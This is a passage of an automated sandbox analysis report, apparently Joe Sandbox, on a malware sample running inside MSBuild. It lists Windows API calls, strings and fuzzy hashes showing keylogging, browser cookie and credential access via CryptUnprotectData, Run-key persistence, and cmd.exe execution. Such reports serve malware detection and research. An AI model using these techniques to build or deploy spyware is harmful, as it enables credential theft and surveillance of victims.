                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                          Strings
                                          • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                          • API String ID: 1174141254-1980882731
                                          • Opcode ID: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
                                          • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                          • Opcode Fuzzy Hash: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
                                          • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
                                          • CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
                                          • CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A
                                            • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                            • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread$LocalTimewsprintf
                                          • String ID: Offline Keylogger Started
                                          • API String ID: 465354869-4114347211
                                          • Opcode ID: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
                                          • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                          • Opcode Fuzzy Hash: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
                                          • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                          APIs
                                            • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                            • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                          • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040AF6E
                                          • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040AF7A
                                          • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread$LocalTime$wsprintf
                                          • String ID: Online Keylogger Started
                                          • API String ID: 112202259-1258561607
                                          • Opcode ID: be6d66d5fa79c5f31e74c778d4d5e15bc8bc5d5b3a82591b70bbeab99a5f0c5b
                                          • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                          • Opcode Fuzzy Hash: be6d66d5fa79c5f31e74c778d4d5e15bc8bc5d5b3a82591b70bbeab99a5f0c5b
                                          • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                          APIs
                                          • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LocalTime
                                          • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                          • API String ID: 481472006-3277280411
                                          • Opcode ID: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
                                          • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                          • Opcode Fuzzy Hash: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
                                          • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                          APIs
                                          • GetLocalTime.KERNEL32(?), ref: 00404F81
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                          • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                          Strings
                                          • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Create$EventLocalThreadTime
                                          • String ID: KeepAlive | Enabled | Timeout:
                                          • API String ID: 2532271599-1507639952
                                          • Opcode ID: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
                                          • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                          • Opcode Fuzzy Hash: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
                                          • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                          APIs
                                          • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                          • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: CryptUnprotectData$crypt32
                                          • API String ID: 2574300362-2380590389
                                          • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                          • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                          • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                          • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                          APIs
                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
                                          • GetLastError.KERNEL32 ref: 0044C296
                                          • __dosmaperr.LIBCMT ref: 0044C29D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorFileLastPointer__dosmaperr
                                          • String ID: PkGNG
                                          • API String ID: 2336955059-263838557
                                          • Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                          • Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
                                          • Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                          • Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                          • CloseHandle.KERNEL32(?), ref: 004051CA
                                          • SetEvent.KERNEL32(?), ref: 004051D9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEventHandleObjectSingleWait
                                          • String ID: Connection Timeout
                                          • API String ID: 2055531096-499159329
                                          • Opcode ID: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                                          • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                          • Opcode Fuzzy Hash: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                                          • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                          • API String ID: 2005118841-1866435925
                                          • Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                          • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                          • Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                          • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                          APIs
                                          • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
                                          • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FormatFreeLocalMessage
                                          • String ID: @J@$PkGNG
                                          • API String ID: 1427518018-1416487119
                                          • Opcode ID: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                                          • Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
                                          • Opcode Fuzzy Hash: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                                          • Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659
                                          APIs
                                          • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
                                          • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,762337E0,?), ref: 0041384D
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,762337E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateValue
                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                          • API String ID: 1818849710-1051519024
                                          • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                          • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                          • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                          • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                            • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                            • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                          • String ID: bad locale name
                                          • API String ID: 3628047217-1405518554
                                          • Opcode ID: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                                          • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                          • Opcode Fuzzy Hash: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                                          • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                          APIs
                                          • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                          • RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                          • RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateValue
                                          • String ID: Control Panel\Desktop
                                          • API String ID: 1818849710-27424756
                                          • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                          • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                          • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                          • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                          • ShowWindow.USER32(00000009), ref: 00416C61
                                          • SetForegroundWindow.USER32 ref: 00416C6D
                                            • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                            • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                            • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                          • String ID: !D@
                                          • API String ID: 3446828153-604454484
                                          • Opcode ID: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
                                          • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                          • Opcode Fuzzy Hash: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
                                          • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExecuteShell
                                          • String ID: /C $cmd.exe$open
                                          • API String ID: 587946157-3896048727
                                          • Opcode ID: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                                          • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                          • Opcode Fuzzy Hash: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                                          • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                          APIs
                                          • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                          • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetLastInputInfo$User32.dll
                                          • API String ID: 2574300362-1519888992
                                          • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                          • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                          • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                          • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                          APIs
                                          Strings
                                          • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                          • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                          • API String ID: 3472027048-1236744412
                                          • Opcode ID: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                                          • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                          • Opcode Fuzzy Hash: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                                          • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                          APIs
                                            • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                            • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                            • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                          • Sleep.KERNEL32(000001F4), ref: 0040A573
                                          • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Window$SleepText$ForegroundLength
                                          • String ID: [ $ ]
                                          • API String ID: 3309952895-93608704
                                          • Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                          • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                          • Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                          • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                          • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                          • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                          • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                          • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                          • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                          • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                          • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
                                          • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateHandleReadSize
                                          • String ID:
                                          • API String ID: 3919263394-0
                                          • Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                          • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                          • Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                          • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                          APIs
                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleOpenProcess
                                          • String ID:
                                          • API String ID: 39102293-0
                                          • Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                          • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                          • Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                          • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                          APIs
                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                            • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                          • _UnwindNestedFrames.LIBCMT ref: 00439891
                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                          • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                          • String ID:
                                          • API String ID: 2633735394-0
                                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                          • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                          • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                          APIs
                                          • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                          • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                          • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                          • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MetricsSystem
                                          • String ID:
                                          • API String ID: 4116985748-0
                                          • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                          • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                          • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                          • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                          APIs
                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                            • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                          • String ID:
                                          • API String ID: 1761009282-0
